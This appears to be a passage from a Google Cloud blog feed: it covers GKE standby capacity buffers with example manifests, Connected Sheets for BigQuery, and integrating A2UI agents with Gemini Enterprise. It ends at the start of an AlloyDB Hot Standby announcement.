Under identical traffic loads, the cluster without standby buffers suffered severe latency spikes, with P50, P95, and P99 metrics trapped between 4 and 6 minutes. Conversely, the cluster with standby buffers maintained a P50 latency of just single-digit seconds, while its P95 and P99 metrics briefly peaked at one minute before quickly normalizing to single-digit seconds. Both setups exhibited a similar allocatable core cost, making the buffered approach far more efficient.

The problem: High costs and latency

Traditionally, autoscaling with standard Kubernetes has been effective but slow. Traffic surges or batch jobs require cluster autoscalers to provision fresh nodes, leaving Pods in a pending state. To circumvent delays, you have to resort to clunky workarounds like lowering your Horizontal Pod Autoscaler (HPA) thresholds or managing so-called balloon pods. These workarounds are expensive:

Managing balloon pods is operationally complex, requiring manual configuration and ongoing maintenance of priority classes and resource requests to ensure they function correctly.
Lowering the HPA threshold adds empty (wasted) space that linearly scales with the size of the node pool.

Both GKE active and standby buffers allow capacity to be defined declaratively, removing the need for clunky and operationally heavy workarounds.

In addition, GKE standby buffers lower infrastructure costs by saving the node’s state to disk and releasing its compute and memory, so you pay only for persistent disk and IP addresses. Combined with an active buffer, this gives you near-instant pod scheduling with performance similar to over-provisioning, at a fraction of the cost.

Active and standby buffers working together

All GKE capacity buffers operate on a principle similar to video streaming on platforms like YouTube. By proactively attempting to provision and manage available capacity ahead of impending demand (much like pre-downloading video content) GKE helps to ensure that resources are readily available when they’re needed.

With today’s launch, the two types of capacity buffers can work in harmony:

Active buffer: Cluster Autoscaler works to reserve enough capacity for a predefined number of pods on existing cluster nodes, and, if needed, provisions extra nodes. Select this ready-to-use buffer to provide capacity to your most latency-sensitive workloads.
Standby buffers: Nodes are pre-provisioned and fully initialized with necessary components like Kubernetes DaemonSets, and given time to preload images, but are then suspended, while the underlying compute capacity is released to save costs. When demand spikes, these nodes resume 2-3x faster than creating a fresh node, bridging the gap between cold starts and always-on capacity.

The active buffer covers the initial spike until standby buffers resume. The system prioritizes refilling the active buffer from the standby buffer. The standby buffer handles an extended load and protects against slower node cold starts. As standby buffers refill, they initially kick into an active state for a configurable amount of time before they are suspended, providing a boost of active capacity during sustained traffic loads.
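The interplay described above can be approximated with a toy model. This is a minimal sketch, not GKE's scheduler: the class name, field names, and all latency values are illustrative assumptions, and it deliberately ignores buffer refill so that the three tiers (active, standby, cold start) stay visible.

```python
from dataclasses import dataclass


@dataclass
class BufferModel:
    """Toy model; latencies are illustrative assumptions, not GKE measurements."""
    active_units: int                     # pods that fit in the active buffer
    standby_units: int                    # pods that fit on suspended standby nodes
    active_latency_s: float = 1.0         # assumed: capacity is already running
    resume_latency_s: float = 30.0        # assumed: time to resume a suspended node
    cold_start_latency_s: float = 240.0   # assumed: time to provision a fresh node


def scheduling_latencies(model: BufferModel, new_pods: int) -> list[float]:
    """Estimate a scheduling latency for each pod in a single burst."""
    latencies = []
    for i in range(new_pods):
        if i < model.active_units:
            # Served from capacity that is already up.
            latencies.append(model.active_latency_s)
        elif i < model.active_units + model.standby_units:
            # Has to wait for a suspended node to resume.
            latencies.append(model.resume_latency_s)
        else:
            # Both buffers are exhausted, so a fresh node is needed.
            latencies.append(model.cold_start_latency_s)
    return latencies
```

In this model, a burst larger than both buffers combined falls back to the cold-start tier, which is why the sizing of each buffer matters.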

Early benchmarks

In our tests, using standby buffers enabled us to deliver sub-second Agent Sandbox scheduling latency at up to 90% lower cost compared to complete overprovisioning.

Optimized for business needs

Businesses are under constant pressure to optimize resource consumption while streamlining operations. Recognizing that organizations need smarter tools to manage sporadic and spiky workloads, we worked hard to deliver standby buffers quickly. Now, whether you’re running agents, batch jobs, CI/CD pipelines, game servers, or other bursty workloads, GKE capacity buffers allow you to dynamically balance performance and cost. You can finally define your "insurance policy" against traffic spikes without paying a high premium for it. With GKE standby buffers you can:

Circumvent cold starts: Nodes suspended by standby buffers resume 2-3x faster than provisioning fresh nodes, reducing pod scheduling latency during traffic spikes and sustained traffic load.
Enjoy lower costs: A standby buffer incurs a fraction of the cost of active capacity because the underlying VM is suspended. You pay for storage and an IP address, rather than for full compute-hours.
Gain declarative control: Replace complex balloon pod workarounds with the simple, native declarative CapacityBuffers API, explicitly stating how much headroom you need, and letting GKE handle the rest.
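To make the cost argument concrete, here is a rough comparison of an always-on buffer with a suspended one. It is a sketch under stated assumptions: the function name is hypothetical and the prices are placeholders, not Google Cloud pricing. The only fact taken from the text is that a suspended node keeps its disk and IP charges and drops its compute charges.

```python
def hourly_buffer_cost(nodes: int, compute_per_node: float, disk_per_node: float,
                       ip_per_node: float, suspended: bool) -> float:
    """Hourly cost of a buffer; suspended nodes keep only disk and IP charges."""
    per_node = disk_per_node + ip_per_node
    if not suspended:
        per_node += compute_per_node
    return nodes * per_node


# Placeholder prices (assumptions for illustration only).
PRICES = dict(compute_per_node=0.40, disk_per_node=0.01, ip_per_node=0.005)

active = hourly_buffer_cost(10, suspended=False, **PRICES)
standby = hourly_buffer_cost(10, suspended=True, **PRICES)
savings = 1 - standby / active  # fraction saved by suspending the buffer
```

Substitute your own machine, disk, and IP prices to see how the ratio changes for your node shapes.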

“Using GKE standby capacity buffers has lowered our time-to-ready from several minutes to 30 seconds at a very affordable price.”
- Pedro Spagiari, Chief Architect at Unico

Get started

Ready to improve your performance and save on costs?

Start by defining a CapacityBuffer resource in your cluster to specify your target buffer size.
Try balancing between standby buffers to reduce pod scheduling latency for sustained loads, and active buffers to address immediate unpredictable capacity needs.

Let’s look at an example of how to configure buffers for a Deployment while also using custom ComputeClasses.

Basic setup

Beginning with some basic setup, create a namespace:

```yaml
apiVersion: v1
kind: Namespace
metadata:
  name: my-namespace
```

Then, create a custom ComputeClass (optional):

```yaml
apiVersion: cloud.google.com/v1
kind: ComputeClass
metadata:
  name: my-ccc
  namespace: my-namespace
spec:
  # Buffers will also be created according to these priorities
  priorities:
  - machineFamily: n4
  - machineFamily: n4d
  - machineFamily: c4
  - machineFamily: c4d
  nodePoolAutoCreation:
    enabled: true
```

Define the buffer unit size

You can use a PodTemplate as a reference for the buffer unit size. You can also create a buffer for a specific deployment or any object that defines scale subResource.

```yaml
# Defines the resource requirements for one unit of buffer.
apiVersion: v1
kind: PodTemplate
metadata:
  name: my-buffer-unit-template
  namespace: my-namespace
template:
  spec:
    terminationGracePeriodSeconds: 0
    tolerations:
    # Optional: Ensures buffer pods can land on any node.
    - key: "node-role.kubernetes.io/master"
      operator: "Exists"
      effect: "NoSchedule"
    containers:
    - name: buffer-container
      image: registry.k8s.io/pause:3.9
      resources:
        requests:
          cpu: "1"
          memory: "1Gi"
        limits:
          cpu: "1"
          memory: "1Gi"
    # Optional: Using buffers with a custom ComputeClass
    # controls the properties of the nodes GKE provisions.
    nodeSelector:
      cloud.google.com/compute-class: my-ccc
```

Create buffers

Lastly, create a CapacityBuffer object by referring to our PodTemplate. Here, you create a standby buffer of 50 CPUs and 50 GiB of RAM:

```yaml
apiVersion: autoscaling.x-k8s.io/v1beta1
kind: CapacityBuffer
metadata:
  name: my-standby-buffer-resource-limits
  namespace: my-namespace
  annotations:
    # Optional: Time after which buffer nodes are suspended.
    # Default is 5 minutes.
    buffer.gke.io/standby-capacity-init-time: "5m"
    # Optional: Time after which standby buffers are recreated.
    # Default is 1 day, "never" avoids refreshing.
    buffer.gke.io/standby-capacity-refresh-frequency: "1d"
spec:
  podTemplateRef:
    name: my-buffer-unit-template
  # The limits cap the standby buffer at 50 CPUs and 50Gi of memory in total.
  # When a standby buffer gets used, a new one gets created.
  limits:
    cpu: "50"
    memory: "50Gi"
  provisioningStrategy: "buffer.gke.io/standby-capacity"
```

And an active buffer of 5 CPUs and 5 GiB of RAM (optional):

```yaml
apiVersion: autoscaling.x-k8s.io/v1beta1
kind: CapacityBuffer
metadata:
  name: my-active-buffer-resource-limits
  namespace: my-namespace
spec:
  podTemplateRef:
    name: my-buffer-unit-template
  # The limits cap the active buffer at 5 CPUs and 5Gi of memory in total.
  # When an active buffer gets used, a new one gets created.
  limits:
    cpu: "5"
    memory: "5Gi"
  provisioningStrategy: "buffer.x-k8s.io/active-capacity"
```
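To sanity-check how many buffer units a set of limits allows, the arithmetic can be sketched as follows. This assumes the limits alone determine the buffer size and that a unit is counted only if it fits on every resource; the helper names are hypothetical, the parsers cover only the quantity formats used in this post, and GKE's own calculation may differ.

```python
from fractions import Fraction

_MEMORY_SUFFIXES = {"Ki": 2**10, "Mi": 2**20, "Gi": 2**30, "Ti": 2**40}


def parse_cpu(value: str) -> Fraction:
    """Parse a Kubernetes CPU quantity such as "1" or "500m" into cores."""
    if value.endswith("m"):
        return Fraction(int(value[:-1]), 1000)
    return Fraction(value)


def parse_memory(value: str) -> int:
    """Parse a binary-suffixed memory quantity such as "1Gi" into bytes."""
    for suffix, factor in _MEMORY_SUFFIXES.items():
        if value.endswith(suffix):
            return int(value[: -len(suffix)]) * factor
    return int(value)  # plain byte count


def buffer_units(limits: dict, unit_requests: dict) -> int:
    """Whole buffer units that fit within the limits on both CPU and memory."""
    by_cpu = parse_cpu(limits["cpu"]) // parse_cpu(unit_requests["cpu"])
    by_memory = parse_memory(limits["memory"]) // parse_memory(unit_requests["memory"])
    return int(min(by_cpu, by_memory))


unit = {"cpu": "1", "memory": "1Gi"}  # requests from the PodTemplate above
standby_units = buffer_units({"cpu": "50", "memory": "50Gi"}, unit)
active_units = buffer_units({"cpu": "5", "memory": "5Gi"}, unit)
```

With the 1 CPU / 1Gi unit from the PodTemplate, the two manifests above work out to 50 standby units and 5 active units under these assumptions.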

Finally, apply the above objects to your cluster. That’s it!

Now, any existing and future deployments that can schedule on the space reserved by the buffers will benefit from faster pod scheduling latencies.

Test the buffers

You can check on the status of your buffers. In Kubernetes, suspended nodes can be identified by condition Suspended.

```shell
kubectl get nodes -o custom-columns='NAME:.metadata.name,SUSPENDED:.status.conditions[?(@.type=="Suspended")].status'
```

Expect the following kind of output, and wait for the standby buffers to get suspended.

```
NAME                                                SUSPENDED
gke-my-cluster-nap-n4-standard-8-k960-...-ffbx      False     # Node has been resumed.
gke-my-cluster-nap-n4-standard-4-k960-...-h2x4      <none>    # Node was never suspended.
gke-my-cluster-nap-n4d-standard-8-1cip-...-74jf     True      # Node is suspended.
```
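If you would rather check the same condition from a script, the sketch below reads the standard JSON output of `kubectl get nodes -o json` and reports each node's Suspended condition. The function names are hypothetical; the only thing taken from this post is the condition type `Suspended`. The `fetch_nodes` helper assumes `kubectl` is installed and configured for your cluster.

```python
import json
import subprocess
from typing import Optional


def suspended_status(nodes_json: dict) -> dict[str, Optional[str]]:
    """Map node name to the status of its "Suspended" condition (None if absent)."""
    result = {}
    for node in nodes_json.get("items", []):
        name = node["metadata"]["name"]
        conditions = node.get("status", {}).get("conditions", [])
        result[name] = next(
            (c["status"] for c in conditions if c.get("type") == "Suspended"),
            None,  # the node was never suspended
        )
    return result


def fetch_nodes() -> dict:
    """Run kubectl and parse its JSON output; requires access to the cluster."""
    completed = subprocess.run(
        ["kubectl", "get", "nodes", "-o", "json"],
        check=True, capture_output=True, text=True,
    )
    return json.loads(completed.stdout)
```

Calling `suspended_status(fetch_nodes())` returns a dictionary you can poll until the standby nodes report `"True"`.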

To test the buffers, create a deployment and scale it.

```yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: my-deployment
  namespace: my-namespace
spec:
  replicas: 1
  selector:
    matchLabels:
      app: my-deployment
  template:
    metadata:
      labels:
        app: my-deployment
    spec:
      containers:
      - name: busybox
        image: busybox
        command: ["sleep", "inf"]
        resources:
          requests:
            cpu: "500m"
            memory: "500Mi"
      # Optional: Using buffers with a custom ComputeClass
      # controls the properties of the nodes GKE provisions.
      nodeSelector:
        cloud.google.com/compute-class: my-ccc
```

Scaling this deployment to two replicas allows them to be assigned to the active buffer for immediate scheduling. The active buffer is then immediately refilled from the standby buffer. Simultaneously, the standby buffer initiates the provisioning of new nodes.

If you further scale the deployment to 50 replicas, scheduling all of them on the standby buffer occurs once the nodes resume. New nodes provisioned to refill the standby buffer briefly function as active buffers providing a temporary active standby boost. Therefore, when further scaling the deployment to 100 replicas during this time, you may notice that new replicas benefit from immediate scheduling.

GKE standby buffer best practices

When working with GKE standby buffers, here are a few things to consider:

Define standby buffers that are sufficient to cover the extended load you expect to encounter, so that buffers can refill in the background from a cold start. A sufficiently sized standby buffer can drop your max pod scheduling latency to the time it takes to resume a node — around 30 seconds.
When the buffer starts to get used and is refilled, new buffer nodes initially swing into an active state prior to suspending. This helps to boost active capacity during a prolonged load.
If your application requires the lowest possible pod scheduling latency, define an active buffer size that is sufficient to cover any initial spikes you expect to encounter until standby buffer nodes are able to resume. The system prioritizes refilling the active buffer by consuming the standby buffer. A sufficiently sized active buffer and a sufficiently sized standby buffer can help you achieve one-second pod scheduling latency for a fraction of the cost of overprovisioning.
Experiment with different buffer sizes to get the best result for your workload.

To help with sizing the buffers to achieve your performance targets, we created a simulator, available at https://github.com/gke-labs/buffers-simulator.

Try it yourself!

Active and standby buffers in GKE provide a native solution for low-latency and cost-effective workload scaling by maintaining warm and standby capacity buffers. By circumventing slow node cold starts, buffers help performance-critical applications handle sudden traffic spikes. This feature replaces complex manual workarounds like balloon pods with a simple, declarative API, and allows for fixed, percentage-based, or resource-limited buffering strategies to help maintain strict service-level objectives cost-effectively and without over-provisioning for peak.

Standby buffers are available for GKE clusters running version 1.36.0-gke.2253000 or later. To get started with buffers, check out the documentation.

From petabytes to predictions: Easy BigQuery insights in Google Sheets

Fri, 29 May 2026 16:00:00 +0000

Many organizations’ single source of truth is data that resides in BigQuery, Google’s governed, secure and petabyte-scale data platform. However, the "last mile" of ad-hoc analysis, modeling, and reporting often happens where business users are most comfortable: Google Sheets.

Bridging this gap usually involves exporting data as CSVs. But this is inefficient, creating data silos, version control problems, and security and governance risks. Connected Sheets helps to eliminate this trade-off, turning the familiar Google Sheets interface into a direct, live window into your BigQuery data platform, letting you analyze petabytes of data quickly, securely, and easily.

In this post, we’ll do a quick overview of Connected Sheets, walk through real-world use cases, and show you how to perform enterprise-grade data analysis using BigQuery directly in Google Sheets.

A live window into the single source of truth

Business users often wait days or weeks for simple reports. Connected Sheets solves this by letting you analyze your critical data via a secure, direct connection to billions of rows of live data, with no SQL required.

For data admins, this architecture is appealing because it maintains a strong security and governance posture. They can provision access to specific tables or views, confident that the underlying data cannot be altered from a Connected Sheet. Admins can also take advantage of Google Workspace’s enterprise data protections to control reading, sharing, and copying data throughout its lifecycle.

For end users, the benefit is immediate agility and ease of use. They can use familiar tools like pivot tables, charts, calculated columns, and formulas to analyze billions of rows of live data as if it were a local file, balancing centralized control with the business's demand for speed. End users don’t have to learn technical concepts like databases, schemas, tables, and query languages like SQL to access, analyze, and visualize the data.

Key use cases and core journeys

We consistently hear about three primary use cases for Connected Sheets from customers across industries.

1. Self-service exploratory analysis: Data teams provide access to curated tables and datasets in BigQuery. Business Analysts in sales, operations, finance, or marketing can then build their own pivot tables or charts that run over the entire live data source directly from Sheets, then filter data to answer day-to-day questions, freeing the data team from a constant backlog of ad-hoc requests.

Example: Deep-dive investigation

Scenario: A sales manager analyzes millions of global transactions to review quarterly performance.
Action: Using Connected Sheets, they quickly create a pivot table to summarize revenue by region and product line. When they spot an anomaly (an unexpected revenue spike in EMEA, for example), they simply double-click the summarized value to drill down into exactly what led to that value.
Outcome: Connected Sheets instantly queries and retrieves the precise, granular transaction rows behind that summary value, making it easy and fast to find the root cause.

2. Operational reporting: Business users can create live, refreshable, and easy-to-understand dashboard-like views of their data that their partner teams can rely on and share with executives and leads.

Example: Automated executive summary

Scenario: An operations lead provides weekly updates on sales invoices to their leadership, based on a BigQuery dataset with millions of rows.
Action: The operations lead creates their Connected Sheet and builds a series of charts to visualize invoice trends over time. They then configure the sheet to automatically refresh on a schedule every Monday morning, so it’s always ready ahead of their executive review.
Outcome: The manual routine of exporting data and pasting it into workbooks is completely eliminated. Leadership gets a reliable report and analysis powered by the latest warehouse data.

3. Hybrid data modeling: Data practitioners often need to blend governed warehouse data with real-time manual inputs and annotations. For example, a finance team might pull revenue data from BigQuery and combine it with manual procurement entries from their ERP system in a separate tab, using VLOOKUP to create a consolidated view for month-end reporting.

Example: Custom business metrics

Scenario: A financial analyst calculates custom commission payouts based on live sales data from the company's CRM system. The commission tier logic changes frequently and isn't modeled in the central data warehouse.
Action: Instead of requesting a new data pipeline from their data team, the analyst can add a calculated column directly within the Connected Sheet. They use standard spreadsheet formulas (like IF or IFS) to apply custom business logic directly against the BigQuery data.
Outcome: The analyst retains the flexibility to model scenarios and calculate metrics quickly, while maintaining governed BigQuery data as their single source of truth.
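The tier logic in this example is the kind of rule an IFS formula expresses: conditions are checked in order and the first match wins. The sketch below shows the same idea outside a spreadsheet. The thresholds, rates, and field names are made up for illustration and are not from any real commission plan.

```python
def commission_rate(sale_amount: float) -> float:
    """Tiered rate, evaluated top-down like IFS(); thresholds are hypothetical."""
    if sale_amount >= 100_000:
        return 0.08
    if sale_amount >= 25_000:
        return 0.05
    return 0.02


def add_commission_column(rows: list[dict]) -> list[dict]:
    """Return copies of the rows with a derived 'commission' field added."""
    return [
        {**row, "commission": round(row["amount"] * commission_rate(row["amount"]), 2)}
        for row in rows
    ]


sales = [
    {"rep": "A", "amount": 120_000.0},
    {"rep": "B", "amount": 30_000.0},
    {"rep": "C", "amount": 1_000.0},
]
with_commission = add_commission_column(sales)
```

As with a calculated column, the source rows are left untouched and the derived value lives alongside them.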

Getting started

Connecting Google Sheets to BigQuery is straightforward and requires only a Google Workspace account and a billing-enabled Google Cloud project. There are two primary ways to establish a connection and create a Connected Sheet.

Path 1: Starting from Sheets
This is the typical workflow for users who work primarily within spreadsheets.

Open a new Google Sheet.
Navigate to Data > Data Connectors > Connect to BigQuery.
Select your billing-enabled Google Cloud project.
Browse available datasets, select a Saved Query to connect right away, or input a custom SQL query.
Click Connect.

Path 2: Starting from BigQuery
This workflow is common for data analysts starting from the Google Cloud console.

Navigate to the BigQuery UI in the console.
In the Explorer pane, locate the table or query result you wish to analyze.
Click the Export menu (or the three-dot action menu) next to the asset.
Select Open in > Connected Sheets.

From petabytes to predictions with Connected Sheets

We designed Connected Sheets to help you bridge the gap between the scalability of the cloud and the flexibility of the spreadsheet. With Connected Sheets, we’re making it easier than ever for organizations to put data into the hands of the people who need it.

To explore these features, connect your BigQuery data to Google Sheets today. For more technical details, visit the Connected Sheets documentation.

Developer's guide to Gemini Enterprise and A2UI integration

Fri, 29 May 2026 16:00:00 +0000

If you've built a chatbot, you know this conversation:

User: "Book a table for two tomorrow at 7pm."
Agent: "Okay, for what day?"
User: "Tomorrow."
Agent: "What time?"

A date picker would have ended this in one tap. But until recently, agents had no standard way to render a date picker (or a map, or a multi-select list) inside the chat surface they live in. They could only return generic text or markdown.

Today, we're walking through how to fix that with A2UI, an open protocol for agent-driven user interfaces, and how to integrate an A2UI-enabled agent with Gemini Enterprise (GE) so your agent renders rich and interactive UI natively in the GE chat surface — and in your own custom frontend if you want one. We'll use a working restaurant-finder agent — built with the Google Agent Development Kit (ADK), the A2A protocol, and Gemini — as the reference. The full source is on GitHub and there's a 2-minute demo video.

The problem: agents speak text, but users want UI

Most agent frameworks today return strings. That's fine for short answers, but it breaks down quickly:

Multi-turn slot filling (date, time, party size) burns turns and patience.
Choices among options (which restaurant? which insurance plan?) become long bulleted lists the user has to copy-paste back.
Spatial information (locations, routes, floor plans) is reduced to addresses.

Developers have tried to patch this by sending HTML or JavaScript fragments, but that introduces real risks: cross-site scripting, UI injection from a remote agent you don't fully control, and visual drift from the host app's design system. What's needed is a way to transmit UI that's safe like data and expressive like code.

What A2UI is

A2UI is an open protocol, introduced by Google and co-developed with the Flutter team and product teams behind Gemini Enterprise. Instead of returning text or HTML, an agent returns a JSON payload that describes a UI: a tree of components (Card, Text, Button, ChoicePicker, Image, …) and a separate data model holding the values those components display.
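To picture the split between a component tree and a data model, consider the sketch below. The key names (`components`, `dataModel`, `path`, `literal`) are illustrative assumptions, not the A2UI schema; consult the spec at a2ui.org for the real message format. The point is only that components reference values rather than embedding them.

```python
# Illustrative shape only: key names are assumptions, not the A2UI schema.
payload = {
    "components": [
        {"id": "root", "type": "Card", "children": ["title", "book"]},
        {"id": "title", "type": "Text", "text": {"path": "/restaurant/name"}},
        {"id": "book", "type": "Button", "label": {"literal": "Book a table"}},
    ],
    "dataModel": {"restaurant": {"name": "Example Bistro"}},
}


def resolve(value: dict, data_model: dict) -> str:
    """Resolve a literal value or a slash-separated path into the data model."""
    if "literal" in value:
        return value["literal"]
    node = data_model
    for key in value["path"].strip("/").split("/"):
        node = node[key]
    return node


title_text = resolve(payload["components"][1]["text"], payload["dataModel"])
button_label = resolve(payload["components"][2]["label"], payload["dataModel"])
```

Because the Text component points at a path, changing the restaurant name in the data model changes what is displayed without touching the component tree.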

Three properties make this useful in practice:

Declarative, not executable. The payload is data. The client only renders components from a pre-approved catalog, so a remote agent can't inject arbitrary code or steal credentials through a UI widget.
Streaming-friendly. The format is a flat list of small JSON messages, so the LLM can emit them incrementally and the client can paint as they arrive.
Framework-agnostic. The same agent response renders through Lit, Angular, Flutter, or native mobile. The agent doesn't know — or care — what's on the other end.
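The "pre-approved catalog" idea from the first property can be sketched as a simple allowlist check on the client side. This is a minimal illustration rather than how any particular renderer implements it: the component records use a hypothetical `type` key, and the catalog lists only the component names mentioned in this post.

```python
ALLOWED_COMPONENTS = frozenset({"Card", "Text", "Button", "ChoicePicker", "Image"})


def validate_components(components: list[dict],
                        catalog: frozenset = ALLOWED_COMPONENTS) -> list[str]:
    """Return a list of problems; an empty list means every component is renderable."""
    problems = []
    for component in components:
        kind = component.get("type")
        if kind not in catalog:
            # Unknown types are rejected rather than interpreted.
            problems.append(f"{component.get('id', '?')}: unknown component type {kind!r}")
    return problems
```

A payload that tries to smuggle in something like a `Script` component is reported as a problem instead of being rendered, which is what keeps the payload "data, not code".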

A2UI is also transport-agnostic. The messages ride inside whatever pipe you already use: A2A JSON-RPC, AG-UI, WebSockets, SSE. In our reference implementation, A2UI rides inside the A2A protocol as DataPart objects with the MIME type application/json+a2ui.
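As a rough picture of A2UI riding inside A2A, the sketch below wraps a message in a dictionary shaped like a data part and tags it with the MIME type named above. The exact part layout (`kind`, `data`, `metadata.mimeType`) is an assumption for illustration; check the A2A specification and the reference repo for the authoritative structure.

```python
A2UI_MIME_TYPE = "application/json+a2ui"  # MIME type named in the text above


def to_data_part(a2ui_message: dict) -> dict:
    """Wrap one A2UI message in a dict shaped like an A2A data part (assumed layout)."""
    return {
        "kind": "data",
        "data": a2ui_message,
        "metadata": {"mimeType": A2UI_MIME_TYPE},
    }


def is_a2ui_part(part: dict) -> bool:
    """Tell A2UI payloads apart from other parts in the same response."""
    return (
        part.get("kind") == "data"
        and part.get("metadata", {}).get("mimeType") == A2UI_MIME_TYPE
    )
```

A client can use a check like `is_a2ui_part` to route UI payloads to its renderer while passing plain text parts through unchanged.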

Where A2UI sits in the stack

A2UI is one piece of a four-layer stack. Confusion usually comes from conflating these layers — they're each doing a different job:

Layer	Owns	Examples
App experience	Client shell and conversation state — chat window, input box, message history	CopilotKit, AG-UI
Pixel drawing	Turning component descriptions into actual rendered UI	Lit, Flutter, Angular
Conversation pipeline	Client–server transport — sending messages, receiving responses	A2A Protocol
Cargo (data format)	The thing flowing through the pipeline that describes the UI	A2UI

Read top to bottom: CopilotKit/AG-UI owns the app experience. Lit/Flutter/Angular own the rendering. While CopilotKit and AG-UI provide valuable abstractions, they remain strictly optional for implementing A2UI. In this architecture, A2A serves as the underlying conversation pipeline, while A2UI represents the structured cargo that actually traverses that pipe.

That separation is why the same A2UI payload renders identically in three very different deployment shapes:

Bespoke web app — a custom client shell (like the reference repo's Lit frontend/) plus a custom A2UI renderer.
CopilotKit / AG-UI app — CopilotKit owns the chat shell, an A2UI renderer is registered inside it for rich cards.
Gemini Enterprise — GE is the shell, the renderer, and the transport client. You only build the agent.

So for the GE path, the stack collapses to two layers you control: the A2A endpoint (your agent) and the A2UI cargo it emits. The other two layers are GE's responsibility. CopilotKit and AG-UI are great if you're building a standalone product UI elsewhere — they're just out of scope for embedding an agent inside Gemini Enterprise.

Pattern revisions

The protocol evolves quickly, and different clients support different revisions. Two patterns are common today:

Inline pattern — the agent sends a component tree with the data baked into each component (the pattern Gemini Enterprise renders today).
Decoupled pattern — the agent sends the component tree and the data model as separate messages, so subsequent turns can update one without re-sending the other. This reduces tokens and latency for long-running conversations and is the direction the protocol is heading.

The reference repo serves both patterns from one backend, picking which to emit per request based on the client's X-A2A-Extensions header. As new revisions ship, you add another catalog and the same negotiation pattern keeps working.
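Per-request negotiation of this kind can be sketched as a small header check. The extension URIs below are placeholders, and treating the header value as a comma-separated list is an assumption; the real identifiers and parsing rules come from the protocol and the reference repo.

```python
# Hypothetical extension identifiers, used only for this illustration.
INLINE_EXT = "https://example.com/a2ui/inline"
DECOUPLED_EXT = "https://example.com/a2ui/decoupled"


def choose_pattern(headers: dict[str, str]) -> str:
    """Pick "decoupled" or "inline" from X-A2A-Extensions, else fall back to "text"."""
    normalized = {key.lower(): value for key, value in headers.items()}
    raw = normalized.get("x-a2a-extensions", "")
    requested = {item.strip() for item in raw.split(",") if item.strip()}
    if DECOUPLED_EXT in requested:
        return "decoupled"  # prefer the newer pattern when the client supports it
    if INLINE_EXT in requested:
        return "inline"
    return "text"  # client advertised no UI support
```

Supporting a future revision then means adding one more identifier and one more branch, while older clients keep getting the pattern they asked for.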

How A2UI works inside Gemini Enterprise

Gemini Enterprise ships with a built-in A2UI renderer. For the developer, that means the integration story is short:

Build your A2A agent, embedding an A2UI catalog and example payloads alongside the regular tool definitions.
Register the agent with Gemini Enterprise as an A2A endpoint. (Use make register-gemini-enterprise in the reference repo.)
A GE admin shares the agent with employees, just like any other agent in the GE catalog.

At runtime, the flow looks like this:

The user types a request in the GE chat. GE calls your agent's A2A endpoint and sends along GE's own A2UI catalog — the list of UI components GE knows how to render.
Your agent decides whether a UI widget is the right response. If yes, it emits an A2UI JSON message (e.g., a ChoicePicker of restaurant options). If no, it falls back to text. Both can coexist in the same response.
GE receives the JSON, validates it against its catalog, and renders the widget natively in GE's own design language — so it visually matches the rest of the chat surface.
When the user interacts with the widget (selects three options, picks a date), GE serializes the interaction back into JSON and sends it to your agent as the next turn. Your agent processes structured input, not free-form text.
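The last step, where the agent receives structured input instead of free-form text, might look like the sketch below on the agent side. The message shape (`uiEvent`, `action`, `values`) and the action names are hypothetical and chosen only to illustrate the routing; the actual format is defined by A2UI and by what GE sends.

```python
def handle_turn(message: dict) -> str:
    """Route a turn: structured UI events skip the free-text parsing path."""
    event = message.get("uiEvent")  # hypothetical key for a serialized interaction
    if event is None:
        # Ordinary chat turn: hand the text to the language model as usual.
        return f"text: {message.get('text', '')}"
    if event["action"] == "select_date":
        return f"booking for {event['values']['date']}"
    if event["action"] == "choose_options":
        return "selected: " + ", ".join(event["values"]["options"])
    return f"unsupported action: {event['action']}"
```

Because the date arrives as a typed field, the agent no longer needs a clarifying turn to work out what "tomorrow" means.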

One thing worth flagging: because your agent doesn't ship its own renderer for GE, you don't need to choose a frontend framework to start. Your A2A endpoint can run anywhere — Cloud Run, GKE, on-prem — and GE handles the rendering.

High-level architecture example

The reference implementation is an ADK backend on Cloud Run designed to plug seamlessly into Gemini Enterprise.

Gemini Enterprise connects directly to your agent using standard A2A JSON-RPC calls.
The agent serves the inline message pattern expected by the Gemini Enterprise managed UI.
Custom components like GoogleMap render via Google Maps Embed iframes, with the API key injected server-side so the LLM never sees it.
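Server-side key injection can be sketched as a post-processing step: the model emits a map component containing only a search query, and the backend swaps in the full embed URL before the payload leaves the server. The component fields (`type`, `query`, `src`) and function names are assumptions for illustration, not the reference repo's code; the URL follows the Maps Embed API's place mode.

```python
from urllib.parse import urlencode

EMBED_BASE = "https://www.google.com/maps/embed/v1/place"


def build_embed_url(query: str, api_key: str) -> str:
    """Build a Maps Embed API URL for a place search."""
    return f"{EMBED_BASE}?{urlencode({'key': api_key, 'q': query})}"


def inject_map_urls(components: list[dict], api_key: str) -> list[dict]:
    """Replace each GoogleMap component's 'query' with a ready-to-embed 'src' URL."""
    resolved = []
    for component in components:
        if component.get("type") == "GoogleMap":
            query = component["query"]
            # Copy without the query so the input list is never mutated.
            component = {k: v for k, v in component.items() if k != "query"}
            component["src"] = build_embed_url(query, api_key)
        resolved.append(component)
    return resolved
```

In a deployment the key would typically come from server configuration such as an environment variable or a secret manager, so it never appears in the prompt or in the model's output.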

The following demonstration illustrates how Google Maps functions as a live, interactive component within Gemini Enterprise rather than a static image. Leveraging A2UI's streaming-friendly architecture, the agent updates the map view in real-time—dropping pins and adjusting coordinates incrementally as results arrive from the Maps API.

See it running, then build your own

Detailed implementation guide here.
Demo video (2 minutes, end-to-end with both the Lit shell and Gemini Enterprise): https://youtu.be/_5AaYwyqVio
A2UI spec and component reference: a2ui.org
Gemini Enterprise updates, including the A2UI renderer: What's new in Gemini Enterprise
A2UI generative UI announcement: Introducing A2UI generative UI

If you're already building agents on Google Cloud, the fastest path is to clone the reference repo, run make local-backend for a local smoke test, and then make register-gemini-enterprise to wire it into GE. From there, swap in your own catalog, your own tools, and your own domain. The next time a user asks your agent for "a table for two tomorrow at 7pm," the answer can be a date picker instead of another question.

AlloyDB Hot Standby: Faster failovers, consistent performance

Fri, 29 May 2026 16:00:00 +0000

AlloyDB for PostgreSQL is a fully managed, PostgreSQL-compatible database service designed for the most demanding enterprise workloads. It combines the best of PostgreSQL with the power of Google, delivering exceptional performance, scalability, and availability. We are continuously innovating to make AlloyDB even more resilient, and today, we're excited to announce a significant upgrade to our High Availability (HA) architecture: Hot Standby.

Understanding AlloyDB HA Architecture

